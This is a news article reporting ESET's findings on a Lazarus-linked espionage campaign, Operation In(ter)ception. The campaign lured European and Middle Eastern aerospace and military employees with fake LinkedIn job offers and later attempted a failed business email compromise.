Operation In(ter)reception: Hackers target targets Military and Aerospace employees in Europe and the Middle East

Security researchers from ESET took a new sophisticated cyber-espionage campaign directed against aerospace and military organizations in Europe and the Middle East with an aim to spy on key employees of the targeted firms and, in some case, even to siphon money.

The campaign, dubbed “Operation In(ter)ception” because of a reference to “Inception” in the malware sample, took place between September to December 2019, according to a new report cybersecurity firm ESET.

“The primary goal of the operation was espionage,” the researchers told The Hacker News. “However, in one of the cases we investigated, the attackers tried to monetize access to a victim’s email account through a business email compromise (BEC) attack as the final stage of the operation.”

The financial motivation behind the attacks, coupled with similarities in targeting and development environment, have led ESET to suspect Lazarus Group, a notorious hacking group that’s been attributed to working on behalf of the North Korean government to fund the country’s illicit weapon and missile programs.

Social Engineering via LinkedIn

Stating that the campaign was highly targeted, ESET said it relied on social engineering tricks to lure employees working for the chosen companies with fake job offers using LinkedIn’s messaging feature, posing as HR managers of well-known companies in the aerospace and defense industry, including Collins Aerospace and General Dynamics.

Experts noticed that the attackers used WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware.

ESET researchers also discovered that threat actors behind the Operation In(ter)ception attempted to use the compromised accounts with the target organizations to launch BEC attacks against other businesses.

The BEC attempts monitored by ESET failed because the victims contacted the compromised organizations to request additional info on their requests.

“First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account. For further communication with the customer, they used their own email address mimicking the victim’s.” continues the report.

“Here, the attackers were unsuccessful — rather than paying the invoice, the customer responded with inquiries about the requested sum. As the attackers urged the customer to pay, the customer ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side.

Additional details on the attacks, including Indicators of Compromise (IoCs) and MITRE ATT&CK techniques, are reported in the paper published by the experts.